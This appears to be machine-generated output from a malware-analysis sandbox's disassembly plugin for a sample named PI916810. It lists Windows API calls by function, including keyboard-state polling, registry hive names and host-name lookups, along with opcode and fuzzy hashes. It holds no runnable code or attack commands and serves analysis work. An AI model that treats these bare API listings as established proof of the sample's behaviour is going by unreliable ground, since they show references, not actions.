• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID: ,,O
• API String ID: 2395222682-289689913
• Opcode ID: bb96303b1c2f8bf193771f56c5d1891b412f2676a5b530e54a8d40cacf927d12
• Instruction ID: 3759ad261665334da2e4a18e910736d97cad1e9b7579b1470f962991db0bc58b
• Opcode Fuzzy Hash: bb96303b1c2f8bf193771f56c5d1891b412f2676a5b530e54a8d40cacf927d12
• Instruction Fuzzy Hash: 06C111B1208305AFC700EF25C89492BB7E9BF89748F00496EF58A9B351DB75ED06CB56
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 1c6b005910e7f3662e33487853d0fb70d52c04ace57febc8953331e2fa67fe1d
• Instruction ID: 74250748793dbf7cdec915a7bc05ec24fc48cb0b8860bdd7e87896a051e88f2c
• Opcode Fuzzy Hash: 1c6b005910e7f3662e33487853d0fb70d52c04ace57febc8953331e2fa67fe1d
• Instruction Fuzzy Hash: BA41933029028E9BEF10EF92DC91AEF3761BF19305F00445AFD915B261DB38AD5AC759
APIs
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
  • Part of subcall function 00467A84: _memmove.LIBCMT ref: 00467B0D
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004C55D2
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004C55E8
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004C55F9
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004C560B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004C561C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: ffae6427166d4e479359f40d3f40f1a5b0911777528a2da95fec0539e7342370
• Instruction ID: 4da55313ce069bdbf27055c5850c0763d9af669a8cec085fa39e0dc7edfb1ee9
• Opcode Fuzzy Hash: ffae6427166d4e479359f40d3f40f1a5b0911777528a2da95fec0539e7342370
• Instruction Fuzzy Hash: 3C110824A5015979E721B6A2CC49EFFBF7CFF91B04F40082FB414A20C2EE681D85C5A6
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                            • API String ID: 208665112-3771769585
                                                                                                                                                                            • Opcode ID: 927e3251ccc5e0569fdb93411cbb41e5984aa7548bfdce662e11a2a2e64ac889
                                                                                                                                                                            • Instruction ID: 013cd5c9900a49fae6e48e416bd3b2ea108ff87fc535330ac2cf66e46ee8bc94
                                                                                                                                                                            • Opcode Fuzzy Hash: 927e3251ccc5e0569fdb93411cbb41e5984aa7548bfdce662e11a2a2e64ac889
                                                                                                                                                                            • Instruction Fuzzy Hash: 30113575904124ABCB20BB309D46FDF77ACEB80310F0002BFF90496192EFB89A859759
                                                                                                                                                                            APIs
                                                                                                                                                                            • timeGetTime.WINMM ref: 004C521C
                                                                                                                                                                              • Part of subcall function 00480719: timeGetTime.WINMM(?,75A8B400,00470FF9), ref: 0048071D
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 004C5248
                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 004C526C
                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004C528E
                                                                                                                                                                            • SetActiveWindow.USER32 ref: 004C52AD
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004C52BB
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004C52DA
                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 004C52E5
                                                                                                                                                                            • IsWindow.USER32 ref: 004C52F1
                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 004C5302
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                            • Opcode ID: 43d1a664f22ea0fe3e628e4d75c2dbcc0fcba95f6af60a03f6468d90011c8ae3
                                                                                                                                                                            • Instruction ID: d375233942376d377c2d46a0af6fd708c67a2fefd8d21457694e68338bd9169c
                                                                                                                                                                            • Opcode Fuzzy Hash: 43d1a664f22ea0fe3e628e4d75c2dbcc0fcba95f6af60a03f6468d90011c8ae3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4921AA78204748AFE7505F30EDC8F2A7BA9EF6A346F00047DF401851B2DB756D8A9B29
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 004CD855
                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004CD8E8
                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 004CD8FC
                                                                                                                                                                            • CoCreateInstance.OLE32(004F2D7C,00000000,00000001,0051A89C,?), ref: 004CD948
                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004CD9B7
                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 004CDA0F
                                                                                                                                                                            • _memset.LIBCMT ref: 004CDA4C
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004CDA88
                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004CDAAB
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004CDAB2
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004CDAE9
                                                                                                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 004CDAEB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1246142700-0
                                                                                                                                                                            • Opcode ID: 8b930d9319dcb5639063b3dd7686bbccfe0675673abcd4e24d4d1d9d90816d92
                                                                                                                                                                            • Instruction ID: 66c3dcacde736175d9a1e754be150f271ea30cd86836d0791e30ae2690f3badb
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b930d9319dcb5639063b3dd7686bbccfe0675673abcd4e24d4d1d9d90816d92
                                                                                                                                                                            • Instruction Fuzzy Hash: 13B11A75A00109AFDB04DFA5C888EAEBBB9FF48304B04846EF509EB261DB34ED45CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004C05A7
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 004C0612
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 004C0632
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 004C0649
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004C0678
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 004C0689
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 004C06B5
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 004C06C3
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 004C06EC
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 004C06FA
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 004C0723
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 004C0731
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: 0e7e6bbd9e4d15a644a9b7d57304a449171cede95d84cdb832c1819badac509c
                                                                                                                                                                            • Instruction ID: a30d73d86c76343613737ca11cdc9c0d11dff4d723fa05dc13dc7533b27fd002
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e7e6bbd9e4d15a644a9b7d57304a449171cede95d84cdb832c1819badac509c
                                                                                                                                                                            • Instruction Fuzzy Hash: DB51CC28A047846AFB75DBA08454FEBAFB49F12340F08459F95C15A2C3DA5C9B4CCB69
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004BC746
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004BC758
                                                                                                                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004BC7B6
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 004BC7C1
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004BC7D3
                                                                                                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004BC827
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004BC835
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004BC846
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004BC889
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004BC897
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004BC8B4
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004BC8C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                            • Opcode ID: e389d741a798c178f90f525bc21e494a2bdfd2159f194c61d80c9db5a2cd56d3
                                                                                                                                                                            • Instruction ID: 62e8455b905265e42b7f1b5f44881aa3e7c0ac91636732f5847836c56c3b47c6
                                                                                                                                                                            • Opcode Fuzzy Hash: e389d741a798c178f90f525bc21e494a2bdfd2159f194c61d80c9db5a2cd56d3
                                                                                                                                                                            • Instruction Fuzzy Hash: B4514E71B00205ABDB18CFB9DDC9AAEBBBAEB88311F14813DF515D6291D7709D048B54
APIs
  • Part of subcall function 00461B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00462036,?,00000000,?,?,?,?,004616CB,00000000,?), ref: 00461B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004620D3
• KillTimer.USER32(-00000001,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0046216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0049BEF6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0049BF27
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0049BF3E
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0049BF5A
• DeleteObject.GDI32(00000000), ref: 0049BF6C
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: eb9bf25f5823cb72069002bf2d9d1d79f7aa5b2d8decf61b561a22f662d7a0f5
• Instruction ID: 7018638f73c548710e08e5335be0272dd4550a262ab6fbe5b8ec1165968db121
• Opcode Fuzzy Hash: eb9bf25f5823cb72069002bf2d9d1d79f7aa5b2d8decf61b561a22f662d7a0f5
• Instruction Fuzzy Hash: 8861D130104A50EFCB359F14EE48B267BF1FF51306F14443EE5428AA65D7B9A886DF8A
APIs
  • Part of subcall function 004625DB: GetWindowLongW.USER32(?,000000EB), ref: 004625EC
• GetSysColor.USER32(0000000F), ref: 004621D3
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 6ad2d3c9fcc9ad9a09edb1f50fd21414028bd3c25f1fd66b1845fcae755b24e3
• Instruction ID: ad0f8fbefc05282e79103347f71faa7266aa082a6205b673d1dc5bd0d4dbe6b8
• Opcode Fuzzy Hash: 6ad2d3c9fcc9ad9a09edb1f50fd21414028bd3c25f1fd66b1845fcae755b24e3
• Instruction Fuzzy Hash: 0B41E330000580BFDB215F68DC98BBA3B65EB06331F1482B6FD618E2E2D7758D42DB1A
APIs
• CharLowerBuffW.USER32(?,?,004EF910), ref: 004CAB76
• GetDriveTypeW.KERNEL32(00000061,0051A620,00000061), ref: 004CAC40
• _wcscpy.LIBCMT ref: 004CAC6A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 348fed182d804be371a8bece339622fad5576bac366098883b3502fb5bfd1bf9
• Instruction ID: ab1d97fa79abc471a28def0b0ad65297bf65b28ee954f792fa2fb1fc0af44cd7
• Opcode Fuzzy Hash: 348fed182d804be371a8bece339622fad5576bac366098883b3502fb5bfd1bf9
• Instruction Fuzzy Hash: A051A0341183059BC750EF15C881EAEB7E6FF80308F14482EF586572A2EB39AD59CB57
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
  • Part of subcall function 00462344: GetCursorPos.USER32(?), ref: 00462357
  • Part of subcall function 00462344: ScreenToClient.USER32(005267B0,?), ref: 00462374
  • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000001), ref: 00462399
  • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000002), ref: 004623A7
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 004EC2E4
• ImageList_EndDrag.COMCTL32 ref: 004EC2EA
• ReleaseCapture.USER32 ref: 004EC2F0
• SetWindowTextW.USER32(?,00000000), ref: 004EC39A
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004EC3AD
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 004EC48F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID$prR$prR
• API String ID: 1924731296-167123084
• Opcode ID: bca737c4bfe730ee9a36eb1632f873a3fa5893b0a333396599bd18b3ad3d45b9
• Instruction ID: d8d6efbbfea217f3c0f888badb6a5f8b7030c14b06a846dd04f7f43dfd1eaffc
• Opcode Fuzzy Hash: bca737c4bfe730ee9a36eb1632f873a3fa5893b0a333396599bd18b3ad3d45b9
• Instruction Fuzzy Hash: AD51BC30204384AFD710EF21C895F6A3BE5FF88314F00492EF9958B2E2DB74A949CB56
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: 19eea700259d39563bbaa9baa0f4ec99fed09a4e93897bbdfae439024e59176d
• Instruction ID: b137b6b6c7f02505ea00cb3ee92891f280a5b24fc49de00228c9de6bf03d2ee3
• Opcode Fuzzy Hash: 19eea700259d39563bbaa9baa0f4ec99fed09a4e93897bbdfae439024e59176d
• Instruction Fuzzy Hash: 424105B1504205AADF24AF39D841E7B77E8EB04304F20486FE649D7391EAB99C46CB1A
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004E73D9
                                                                                                                                                                            • CreateMenu.USER32 ref: 004E73F4
                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 004E7403
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E7490
                                                                                                                                                                            • IsMenu.USER32(?), ref: 004E74A6
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004E74B0
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E74DD
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004E74E5
                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 967b3362f801221899b5081d005a1a12c555213aad42d76d52312d8ec4bbefb1
• Instruction ID: 278271e067728a30a65e7e51b98e423780917827cac49eee3005c3cd60dba181
• Opcode Fuzzy Hash: 967b3362f801221899b5081d005a1a12c555213aad42d76d52312d8ec4bbefb1
• Instruction Fuzzy Hash: A6417974A00285EFDB20DF65D884E9ABBF5FF49311F14402AF905973A1DB34A914DF58
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004E77CD
• CreateCompatibleDC.GDI32(00000000), ref: 004E77D4
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004E77E7
• SelectObject.GDI32(00000000,00000000), ref: 004E77EF
• GetPixel.GDI32(00000000,00000000,00000000), ref: 004E77FA
• DeleteDC.GDI32(00000000), ref: 004E7803
• GetWindowLongW.USER32(?,000000EC), ref: 004E780D
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004E7821
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004E782D
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 33ef2045f5895504ed83ad1c87ca5cb1f04749205f715704f8f5b194820e8c7e
• Instruction ID: 38cb4abc1a93e83a5f991731555b417128dbba5b0f7951f90d11fa09463a9b99
• Opcode Fuzzy Hash: 33ef2045f5895504ed83ad1c87ca5cb1f04749205f715704f8f5b194820e8c7e
• Instruction Fuzzy Hash: 9831AD31104194BBDF119FB5DC48FEB3B69FF09325F100226FA55A61A1C739E815DBA8
APIs
• _memset.LIBCMT ref: 0048707B
  • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
• __gmtime64_s.LIBCMT ref: 00487114
• __gmtime64_s.LIBCMT ref: 0048714A
• __gmtime64_s.LIBCMT ref: 00487167
• __allrem.LIBCMT ref: 004871BD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004871D9
• __allrem.LIBCMT ref: 004871F0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048720E
• __allrem.LIBCMT ref: 00487225
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00487243
• __invoke_watson.LIBCMT ref: 004872B4
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
• Instruction ID: 3358d3726e2fdc15e74d74c9804e4715243b32050788f976736b33089b1a3a6d
